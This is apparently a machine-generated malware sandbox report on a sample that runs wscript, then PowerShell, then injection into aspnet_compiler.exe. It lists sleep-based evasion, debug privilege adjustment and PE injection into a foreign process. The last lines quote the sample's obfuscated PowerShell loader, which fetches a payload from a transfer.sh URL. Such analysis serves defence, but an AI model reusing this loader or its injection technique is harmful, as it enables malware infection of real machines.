Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2880	Thread sleep time: -8301034833169293s >= -30000s			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 3904	Thread sleep time: -5534023222112862s >= -30000s

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3163	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6359	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Window / User API: threadDelayed 1808
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Window / User API: threadDelayed 7382
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Window / User API: foregroundWindowGot 643
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Window / User API: foregroundWindowGot 681

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 922337203685477

Source: ModuleAnalysisCache.1.dr	Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: ModuleAnalysisCache.1.dr	Binary or memory string: Add-NetEventVmNetworkAdapter
Source: ModuleAnalysisCache.1.dr	Binary or memory string: Get-NetEventVmNetworkAdapter

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process token adjusted: Debug

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

Writes to foreign memory regions

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 402000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 420000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 422000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: D87008	Jump to behavior

Injects a PE file into a foreign processes

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $SZXDCFVGBHNJSDFGH = 'https://transferH-Hsh/DJr8t4/edrfH-Htxt'.Replace('H-H','.');$SOS='%!-X-!5-X-!!-X-5%-X-!-X-!7-X-!8-X-!e-X-!a-X-!d-X-!b-X-!!-X-!5-X-!-X-!7-X-!8-X-!a-X-%0-X-3d-X-%0-X-%7-X-e-X-!5-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-!5-X-%-X-!3-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-5!-X-%7-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%7-X-%c-X-%7-X-7!-X-%e-X-57-X-%7-X-%9-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%7-X-%c-X-%7-X-c-X-!9-X-!5-X-!e-X-%7-X-%9-X-3b-X-0a-X-%!-X-53-X-58-X-!!-X-!3-X-!-X-5-X-!7-X-!%-X-!8-X-!e-X-!a-X-58-X-!!-X-!3-X-!-X-5-X-!7-X-!%-X-!8-X-!a-X-!b-X-%0-X-3d-X-%0-X-%7-X-!!-X-!f-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-1-X-!!-X-53-X-5!-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-!7-X-%7-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%7-X-%c-X-%7-X-57-X-e-X-!c-X-f-X-%7-X-%9-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-%7-X-%c-X-%7-X-7%-X-!9-X-e-X-%7-X-%9-X-3b-X-0a-X-%!-X-53-X-57-X-58-X-!!-X-!5-X-!3-X-5%-X-!-X-!7-X-59-X-!8-X-55-X-!a-X-!9-X-53-X-!!-X-!-X-5-X-!7-X-!8-X-!a-X-%0-X-3d-X-%7-X-!9-X-0-X-!5-X-58-X-%8-X-e-X-0-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-0-X-3-X-0-X-5!-X-%0-X-%!-X-!5-X-!!-X-5%-X-!-X-!7-X-!8-X-!e-X-!a-X-!d-X-!b-X-!!-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-!7-X-!%-X-!8-X-!e-X-!a-X-53-X-!!-X-!-X-!7-X-!8-X-%9-X-%7-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%7-X-%c-X-%7-X-5-X-0-X-57-X-0-X-%d-X-!f-X-%-X-a-X-0-X-!5-X-%7-X-%9-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-%7-X-%c-X-%7-X-!5-X-!-X-!7-X-!8-X-!a-X-%9-X-%e-X-%!-X-53-X-58-X-!!-X-!3-X-!-X-5-X-!7-X-!%-X-!8-X-!e-X-!a-X-58-X-!!-X-!3-X-!-X-5-X-!7-X-!%-X-!8-X-!a-X-!b-X-%8-X-%!-X-53-X-5a-X-58-X-!!-X-!3-X-!-X-5-X-%7-X-%9-X-3b-X-0a-X-%-X-%8-X-%7-X-!9-X-%7-X-%b-X-%7-X-!5-X-58-X-%7-X-%9-X-%8-X-%!-X-53-X-57-X-58-X-!!-X-!5-X-!3-X-5%-X-!-X-!7-X-59-X-!8-X-55-X-!a-X-!9-X-53-X-!!-X-!-X-5-X-!7-X-!8-X-!a-X-%0-X-%d-X-!a-X-f-X-9-X-e-X-%0-X-%7-X-%7-X-%9-X-7c-X-%-X-%8-X-%7-X-!9-X-%7-X-%b-X-%7-X-!5-X-58-X-%7-X-%9-X-3b'.Replace('%','2').Replace('!','4').Replace(''
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $SZXDCFVGBHNJSDFGH = 'https://transferH-Hsh/DJr8t4/edrfH-Htxt'.Replace('H-H','.');$SOS='%!-X-!5-X-!!-X-5%-X-!-X-!7-X-!8-X-!e-X-!a-X-!d-X-!b-X-!!-X-!5-X-!-X-!7-X-!8-X-!a-X-%0-X-3d-X-%0-X-%7-X-e-X-!5-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-!5-X-%-X-!3-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-5!-X-%7-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%7-X-%c-X-%7-X-7!-X-%e-X-57-X-%7-X-%9-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%7-X-%c-X-%7-X-c-X-!9-X-!5-X-!e-X-%7-X-%9-X-3b-X-0a-X-%!-X-53-X-58-X-!!-X-!3-X-!-X-5-X-!7-X-!%-X-!8-X-!e-X-!a-X-58-X-!!-X-!3-X-!-X-5-X-!7-X-!%-X-!8-X-!a-X-!b-X-%0-X-3d-X-%0-X-%7-X-!!-X-!f-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-1-X-!!-X-53-X-5!-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-!7-X-%7-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%7-X-%c-X-%7-X-57-X-e-X-!c-X-f-X-%7-X-%9-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-%7-X-%c-X-%7-X-7%-X-!9-X-e-X-%7-X-%9-X-3b-X-0a-X-%!-X-53-X-57-X-58-X-!!-X-!5-X-!3-X-5%-X-!-X-!7-X-59-X-!8-X-55-X-!a-X-!9-X-53-X-!!-X-!-X-5-X-!7-X-!8-X-!a-X-%0-X-3d-X-%7-X-!9-X-0-X-!5-X-58-X-%8-X-e-X-0-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-0-X-3-X-0-X-5!-X-%0-X-%!-X-!5-X-!!-X-5%-X-!-X-!7-X-!8-X-!e-X-!a-X-!d-X-!b-X-!!-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-!7-X-!%-X-!8-X-!e-X-!a-X-53-X-!!-X-!-X-!7-X-!8-X-%9-X-%7-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%7-X-%c-X-%7-X-5-X-0-X-57-X-0-X-%d-X-!f-X-%-X-a-X-0-X-!5-X-%7-X-%9-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-%7-X-%c-X-%7-X-!5-X-!-X-!7-X-!8-X-!a-X-%9-X-%e-X-%!-X-53-X-58-X-!!-X-!3-X-!-X-5-X-!7-X-!%-X-!8-X-!e-X-!a-X-58-X-!!-X-!3-X-!-X-5-X-!7-X-!%-X-!8-X-!a-X-!b-X-%8-X-%!-X-53-X-5a-X-58-X-!!-X-!3-X-!-X-5-X-%7-X-%9-X-3b-X-0a-X-%-X-%8-X-%7-X-!9-X-%7-X-%b-X-%7-X-!5-X-58-X-%7-X-%9-X-%8-X-%!-X-53-X-57-X-58-X-!!-X-!5-X-!3-X-5%-X-!-X-!7-X-59-X-!8-X-55-X-!a-X-!9-X-53-X-!!-X-!-X-5-X-!7-X-!8-X-!a-X-%0-X-%d-X-!a-X-f-X-9-X-e-X-%0-X-%7-X-%7-X-%9-X-7c-X-%-X-%8-X-%7-X-!9-X-%7-X-%b-X-%7-X-!5-X-58-X-%7-X-%9-X-3b'.Replace('%','2').Replace('!','4').Replace(''			Jump to behavior

